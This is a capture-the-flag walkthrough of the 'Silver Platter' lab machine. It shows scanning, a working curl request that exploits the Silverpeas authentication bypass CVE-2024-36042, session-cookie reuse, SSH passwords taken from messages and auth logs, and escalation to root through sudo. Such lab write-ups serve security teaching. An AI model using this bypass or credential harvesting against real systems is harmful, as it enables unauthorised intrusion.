Skip to main content

Silver Platter

Target Discovery

We begin by identifying open ports on the target machine.

export TARGET_IP=10.10.198.176
nmap -p- -Pn --min-rate 5000 $TARGET_IP

Nmap Scan Results:

Not shown: 65381 closed tcp ports (reset), 151 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy

Initial Enumeration

Browsing http://10.10.198.176/#contact, we find a note:

"If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is scr1ptkiddy."

Navigating to http://10.10.198.176:8080/silverpeas/defaultLogin.jsp, we find a login page for Silverpeas.

Exploiting Silverpeas Authentication Bypass (CVE-2024-36042)

A Google search reveals that Silverpeas (up to version 6.3.4) is vulnerable to a simple authentication bypass (CVE-2024-36042). The flaw allows authentication as any user by omitting the password field in the request.

Exploitation

We send an authentication request as scr1ptkiddy without a password:

curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=scr1ptkiddy&DomainId=0"

Response:

HTTP/1.1 302 Found
Set-Cookie: JSESSIONID=XG8ol2dO2luwA5gzNHbDp4jtMig7y6vQn86wTy6S.ebabc79c6d2a; path=/silverpeas; HttpOnly

Gaining Access

Copy the JSESSIONID value from the response and set it in your browser’s cookies (Storage Tab -> Cookies -> Modify JSESSIONID).

Now, accessing http://10.10.198.176:8080/silverpeas/look/jsp/MainFrame.jsp, we discover two more users: Administrateur and Manager.

Escalating Privileges

Using the same authentication bypass technique, we attempt login as Manager:

curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=Manager&DomainId=0"

Inside the account, we find a message:

"Dude, how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes."

Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

SSH Access as tim

We use the credentials to access the system via SSH:

ssh tim@10.10.198.176
# Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

Verifying user privileges:

id
# uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)

Privilege Escalation

Inspecting authentication logs:

less /var/log/auth.log.2

We find a log entry revealing a docker run command executed as tyler, containing a database password:

Dec 13 15:45:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/op

SSH Access as tyler

Using the extracted password:

ssh tyler@10.10.198.176
# Password: _Zd_zx7N823/

Checking user privileges:

id
# uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

Root Privilege Escalation

Checking sudo privileges:

sudo -l
# (ALL : ALL) ALL

Since tyler has full sudo privileges, we escalate to root:

sudo su
id
# uid=0(root) gid=0(root) groups=0(root)